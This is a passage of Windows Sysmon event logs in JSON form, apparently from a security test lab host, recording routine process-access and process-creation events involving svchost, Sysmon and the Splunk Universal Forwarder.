06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","TargetProcessId":"3896","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nProcessGuid: {E2A3D6B1-106D-5F25-0000-0010A2C80300}\r\nProcessId: 2624\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","ProcessGuid":"{E2A3D6B1-106D-5F25-0000-0010A2C80300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A2C80300}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A2C80300}","TargetProcessId":"2624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A2C80300}\r\nTargetProcessId: 2624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.240","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A2C80300}","TargetProcessId":"2624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 